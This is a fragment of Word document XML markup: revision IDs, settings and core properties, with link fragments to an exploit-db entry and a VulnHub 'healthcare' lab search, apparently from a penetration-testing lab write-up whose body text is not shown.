    <w:lvl w:ilvl="0" w:tplc="691A6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8B"/>
    <w:rsid w:val="00100CA4"/>
    <w:rsid w:val="00134163"/>
    <w:rsid w:val="001D49B6"/>
    <w:rsid w:val="001F317E"/>
    <w:rsid w:val="003F07F9"/>
    <w:rsid w:val="004407DB"/>
    <w:rsid w:val="004E62E7"/>
    <w:rsid w:val="005A30C7"/>
    <w:rsid w:val="006B450D"/>
    <w:rsid w:val="006C058B"/>
    <w:rsid w:val="006E1B27"/>
    <w:rsid w:val="0072413C"/>
    <w:rsid w:val="007F053D"/>
    <w:rsid w:val="00881C28"/>
    <w:rsid w:val="00936BA6"/>
    <w:rsid w:val="00970758"/>
    <w:rsid w:val="009B64C1"/>
    <w:rsid w:val="00A64573"/>
    <w:rsid w:val="00A67882"/>
    <w:rsid w:val="00A72B38"/>
    <w:rsid w:val="00AD1B03"/>
    <w:rsid w:val="00B803E3"/>
    <w:rsid w:val="00C13D4C"/>
    <w:rsid w:val="00D74CF8"/>
    <w:rsid w:val="00D90C15"/>
    <w:rsid w:val="00DA52CE"/>
    <w:rsid w:val="00E53D71"/>
    <w:rsid w:val="00EA6630"/>
    <w:rsid w:val="00EB1B19"/>
    <w:rsid w:val="00EB5603"/>
    <w:rsid w:val="00F1152A"/>
    <w:rsid w:val="00F17A72"/>
    <w:rsid w:val="00F270C8"/>
    <w:rsid w:val="00F75534"/>
    <w:rsid w:val="00F8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E459"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{35D26004-9DAB-4C08-B0EF-84BFD60A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0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41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5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www.exploit-db.com/exploits/4974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vulnhub.com/?q=healthcare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Akanksha.P</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Akanksha.P</cp:lastModifiedBy>
  <cp:revision>17</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-10-21T12:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-23T12:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>